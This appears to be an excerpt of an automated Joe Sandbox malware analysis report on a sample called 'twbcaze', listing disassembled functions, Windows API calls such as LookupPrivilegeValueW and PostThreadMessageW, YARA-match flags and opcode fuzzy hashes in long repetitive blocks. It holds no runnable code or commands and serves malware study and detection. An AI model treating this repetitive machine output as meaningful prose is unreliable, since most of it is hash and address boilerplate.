                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_820000_twbcaze.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                          • Instruction ID: c46011bb0c46dfed5c8ab186c0f719e5b9e72ad0d6ef7da6a0d9d2ed8661a3c9
                                          • Opcode Fuzzy Hash: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                          • Instruction Fuzzy Hash: 8FB0927110054087E205A704D905B4AB212FB90B00F808A35A4468A591D66A9A28C686
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0083FDC0 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.363230284.0000000000830000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: true
                                          • Associated: 00000007.00000002.363230284.0000000000820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000910000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000920000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000924000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000927000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000930000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000990000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_820000_twbcaze.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                          • Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
                                          • Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                          • Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0083FEA0 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.363230284.0000000000830000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: true
                                          • Associated: 00000007.00000002.363230284.0000000000820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000910000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000920000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000924000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000927000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000930000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000990000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_820000_twbcaze.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                                          • Instruction ID: c5322eb374cbfb3adeb08d178b54e1ae74a7d58a0408861c097d1ba4bd942992
                                          • Opcode Fuzzy Hash: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                                          • Instruction Fuzzy Hash: 0DB01272200640C7F31A9714D906F4B7210FB80F00F00893AA007C19A1DB389A2CD556
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0083FED0 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.363230284.0000000000830000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: true
                                          • Associated: 00000007.00000002.363230284.0000000000820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000910000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000920000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000924000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000927000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000930000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000990000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_820000_twbcaze.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                          • Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
                                          • Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                          • Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0083FFB4 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.363230284.0000000000830000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: true
                                          • Associated: 00000007.00000002.363230284.0000000000820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000910000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000920000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000924000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000927000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000930000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000990000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_820000_twbcaze.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                          • Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
                                          • Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                          • Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00409AA0 Relevance: .1, Instructions: 92COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.363182622.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_400000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 853c01b66d24f589df6b89bde03758f04558a5ab365de05a0f584bb7a63a4c44
                                          • Instruction ID: 4f20240aff7f2371bb6e5cfcebb6b85206ba00274494e6c7b70a30fa46eb6871
                                          • Opcode Fuzzy Hash: 853c01b66d24f589df6b89bde03758f04558a5ab365de05a0f584bb7a63a4c44
                                          • Instruction Fuzzy Hash: 48213CB2D4420957CB25D664AD52BFF737CAB54314F04007FE949A3182F638BF498BA6
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041A5F0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 9 41a5f0-41a621 call 41af20 RtlAllocateHeap
                                          APIs
                                          • RtlAllocateHeap.NTDLL(&EA,?,00414C9F,00414C9F,?,00414526,?,?,?,?,?,00000000,00409CE3,?), ref: 0041A61D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.363182622.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_400000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateHeap
                                          • String ID: &EA
                                          • API String ID: 1279760036-1330915590
                                          • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                          • Instruction ID: 65e1271fa0e6f293e5ca7d904ec396d69fb6d51de338ced040ab1bfa87458b74
                                          • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                          • Instruction Fuzzy Hash: 1DE012B2200208ABDB14EF99DC41EA777ADAF88668F118559BA085B242C630F9118AB0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00408308 Relevance: 1.6, APIs: 1, Instructions: 57threadwindowCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 207 408308-40835a call 41be20 call 41c9c0 call 40ace0 call 414e40 216 40835c-40836e PostThreadMessageW 207->216 217 40838e-408392 207->217 219 408370-40838a call 40a470 216->219 220 40838d 216->220 219->220 220->217
                                          APIs
                                          • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.363182622.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_400000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: MessagePostThread
                                          • String ID:
                                          • API String ID: 1836367815-0
                                          • Opcode ID: ea6ba9d803efb22ca4ac9589cb0a64232fc12c7ef3beeaf7f2458a896769aa6f
                                          • Instruction ID: 1686aeac70786c8eb8174c578c9f7d289126589df7242d7fccb09c1ecdb24f1f
                                          • Opcode Fuzzy Hash: ea6ba9d803efb22ca4ac9589cb0a64232fc12c7ef3beeaf7f2458a896769aa6f
                                          • Instruction Fuzzy Hash: CB01B571A8031877E720A6919C43FFE776CAB40B54F054119FF44BA2C1E6E86A0546EA
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00408310 Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 223 408310-40831f 224 408328-40835a call 41c9c0 call 40ace0 call 414e40 223->224 225 408323 call 41be20 223->225 232 40835c-40836a PostThreadMessageW 224->232 233 40838e-408392 224->233 225->224 234 40836c-40836e 232->234 235 408370-40838a call 40a470 234->235 236 40838d 234->236 235->236 236->233
                                          APIs
                                          • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.363182622.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_400000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: MessagePostThread
                                          • String ID:
                                          • API String ID: 1836367815-0
                                          • Opcode ID: 2b8d0fafe82a707928844ec316f7e0105081546aa8e26e9dc354d60cbf214f5e
                                          • Instruction ID: a0f03ca10d03d1d5c38d3c187be8154ddc7636efa3ebbcfd239e67dddfad06e3
                                          • Opcode Fuzzy Hash: 2b8d0fafe82a707928844ec316f7e0105081546aa8e26e9dc354d60cbf214f5e
                                          • Instruction Fuzzy Hash: B4018471A8032877E720A6959C43FFE776C6B40B54F05012AFF04BA1C1E6A8690546EA
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004082D6 Relevance: 1.5, APIs: 1, Instructions: 41threadwindowCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 254 4082d6-4082d8 255 4082a4-4082a5 254->255 256 4082da-4082de 254->256 257 4082e0-4082fd call 41b860 call 41b710 256->257 258 40835b-40835e 256->258 260 408360-40836a PostThreadMessageW 258->260 261 40836c-40836e 258->261 260->261 263 408370-40838a call 40a470 261->263 264 40838d-408392 261->264 263->264
                                          APIs
                                          • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.363182622.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_400000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: MessagePostThread
                                          • String ID:
                                          • API String ID: 1836367815-0
                                          • Opcode ID: a36db288dd01462fe6699b972798525089e77336f9fa5e20efdaf2f7a1141a6c
                                          • Instruction ID: d54e8038d77a2ff7d11882d61ae61de58467cc53902c56b6dd9a3359c70c2a15
                                          • Opcode Fuzzy Hash: a36db288dd01462fe6699b972798525089e77336f9fa5e20efdaf2f7a1141a6c
                                          • Instruction Fuzzy Hash: AAF0973164020870DA2176713C43FFE3708DB81B08F0400BFFE88A52C2DEBA441686FA
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041A630 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 276 41a630-41a661 call 41af20 RtlFreeHeap
                                          APIs
                                          • RtlFreeHeap.NTDLL(00000060,00409CE3,?,?,00409CE3,00000060,00000000,00000000,?,?,00409CE3,?,00000000), ref: 0041A65D
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.363182622.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_400000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: FreeHeap
                                          • String ID:
                                          • API String ID: 3298025750-0
                                          • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                          • Instruction ID: a31e03847b69acb9206512889bce5d114748d47cfafea9ced6338f279cce3475
                                          • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                          • Instruction Fuzzy Hash: 64E04FB12002046BD714DF59DC45EE777ADEF88754F014559FD0857241C630F910CAF0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041A790 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 279 41a790-41a7c4 call 41af20 LookupPrivilegeValueW
                                          APIs
                                          • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1C2,0040F1C2,0000003C,00000000,?,00409D55), ref: 0041A7C0
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.363182622.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_400000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: LookupPrivilegeValue
                                          • String ID:
                                          • API String ID: 3899507212-0
                                          • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                          • Instruction ID: b8658252b81b08ed33e4a874e4d8f80b0614426e32f2ee3a7d9107b08e04f012
                                          • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                          • Instruction Fuzzy Hash: 9EE01AB12002086BDB10DF49DC85EE737ADAF88654F018155BA0857241C934E8118BF5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041A670 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                          Download Yara Rule
                                          APIs
                                          • ExitProcess.KERNELBASE(?,?,00000000,?,?,?), ref: 0041A698
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.363182622.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_400000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ExitProcess
                                          • String ID:
                                          • API String ID: 621844428-0
                                          • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                          • Instruction ID: 94fb8da58e6992106aa2b0ab061ea4c6965e877b66759b154152d16d38dd5c99
                                          • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                          • Instruction Fuzzy Hash: B9D017726002187BD620EB99DC85FD777ACDF487A4F0180AABA1C6B242C531FA108AE1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Non-executed Functions

                                          Function 00417C85 Relevance: 4.1, Strings: 3, Instructions: 367COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.363182622.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_400000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: =$www.$www.
                                          • API String ID: 0-3343787489
                                          • Opcode ID: 43630f2af3dd7c2ce2a8271cba94f5506f58cdf469a03639078d30cc3f113a0f
                                          • Instruction ID: a415aada695ca48bd596ef0aed218874816f8cdfd7c5552bcf20e41dd4a36fc7
                                          • Opcode Fuzzy Hash: 43630f2af3dd7c2ce2a8271cba94f5506f58cdf469a03639078d30cc3f113a0f
                                          • Instruction Fuzzy Hash: ADD11AB2994304ABD714DBB0CC82FEBB778EF44708F40455EF6495B182DA78A684CBD9
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00417CE2 Relevance: .1, Instructions: 69COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.363182622.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_400000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 66ce10ed004e912327c4817aec277738ae227ae0974f461223c4264c1b0c3650
                                          • Instruction ID: dda4dc6a57abaa663ba500a739b63e9e871c96e823b7519d08a7515e6c8355b5
                                          • Opcode Fuzzy Hash: 66ce10ed004e912327c4817aec277738ae227ae0974f461223c4264c1b0c3650
                                          • Instruction Fuzzy Hash: D711AB76DADA4906E7264A647C42AE6FBB0EA1370072895AFDD85DF343D605C04383CA
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00416C9B Relevance: .1, Instructions: 61COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.363182622.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_400000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 430b32d48c3472a26d8b0c5a84cf6b08d3b8f59d031359f544a6728a7160a7ca
                                          • Instruction ID: afb282b730c00e81312c89a8fedaef751899b96b71684bab589d9aa07c593246
                                          • Opcode Fuzzy Hash: 430b32d48c3472a26d8b0c5a84cf6b08d3b8f59d031359f544a6728a7160a7ca
                                          • Instruction Fuzzy Hash: CE019C329082935ED717CE68D8456D9FB74DD86118B5883DADD808F2A3D325C10B87D4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00840060 Relevance: .0, Instructions: 6COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.363230284.0000000000830000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: true
                                          • Associated: 00000007.00000002.363230284.0000000000820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000910000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000920000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000924000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000927000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000930000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000990000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_820000_twbcaze.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4c5d85a427470f550e29695eb19de3105b1c03314207db60bf040a26eb212f22
                                          • Instruction ID: 5a023e870da9c1ddb48dfa425d4b1b106951aaa9a6b60f468992a3f00291b547
                                          • Opcode Fuzzy Hash: 4c5d85a427470f550e29695eb19de3105b1c03314207db60bf040a26eb212f22
                                          • Instruction Fuzzy Hash: 5CB012B2100580C7E30D9714DD06B4B7210FB80F00F00893AA10B81861DB7C9A2CD45E
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 008401D4 Relevance: .0, Instructions: 6COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.363230284.0000000000830000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: true
                                          • Associated: 00000007.00000002.363230284.0000000000820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000910000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000920000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000924000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000927000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000930000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000990000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_820000_twbcaze.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 8778145c82cc07ced6a03fc17a8dcea4f431f55768a4b0417211ed07bf4591cb
                                          • Instruction ID: 018f436d7687ff9142db90ebed9d2f0c0dfd000868ccafab48d689f3c6447ef1
                                          • Opcode Fuzzy Hash: 8778145c82cc07ced6a03fc17a8dcea4f431f55768a4b0417211ed07bf4591cb
                                          • Instruction Fuzzy Hash: B2B01272100940C7E359A714ED46B4B7210FB80F01F00C93BA01B81851DB38AA3CDD96
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0084010C Relevance: .0, Instructions: 6COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.363230284.0000000000830000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: true
                                          • Associated: 00000007.00000002.363230284.0000000000820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000910000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000920000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000924000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000927000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000930000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000990000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_820000_twbcaze.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ee2127f5049c20af2db79b3523ae30c516210f3a5483c1737df9ea5d0a06ca55
                                          • Instruction ID: 6f78205b53d22ab4e8c81d7e3ead40d6172b524c4c965a7ad5e52c730ffb8076
                                          • Opcode Fuzzy Hash: ee2127f5049c20af2db79b3523ae30c516210f3a5483c1737df9ea5d0a06ca55
                                          • Instruction Fuzzy Hash: B8B01273104D40C7E3099714DD16F4FB310FB90F02F00893EA00B81850DA38A92CC846
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 008407AC Relevance: .0, Instructions: 6COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.363230284.0000000000830000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: true
                                          • Associated: 00000007.00000002.363230284.0000000000820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000910000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000920000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000924000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000927000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000930000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000990000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_820000_twbcaze.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                          • Instruction ID: cdb92b4df541c6703467cf01e2fb590a315ac15b2f911c24ec3250dccee83ae6
                                          • Opcode Fuzzy Hash: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                          • Instruction Fuzzy Hash: 64B01272200540C7E3099724D906B4B7310FB80F00F008D3AE04781892DB78992CD487
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00840C40 Relevance: .0, Instructions: 6COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.363230284.0000000000830000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: true
                                          • Associated: 00000007.00000002.363230284.0000000000820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000910000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000920000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000924000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000927000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000930000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000990000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_820000_twbcaze.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f629700e8a0faf16c3a99a987d81dda9b9e9a08178d0ad03aaec4005a132e95a
                                          • Instruction ID: df3521920546c87a7cfa40f03b9d1cb3325e43f750a27356a7d3e25b902d3ed9
                                          • Opcode Fuzzy Hash: f629700e8a0faf16c3a99a987d81dda9b9e9a08178d0ad03aaec4005a132e95a
                                          • Instruction Fuzzy Hash: FAB01272201540C7F349A714D946F5BB210FB90F04F008A3AE04782850DA38992CC547
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 008410D0 Relevance: .0, Instructions: 6COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.363230284.0000000000830000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: true
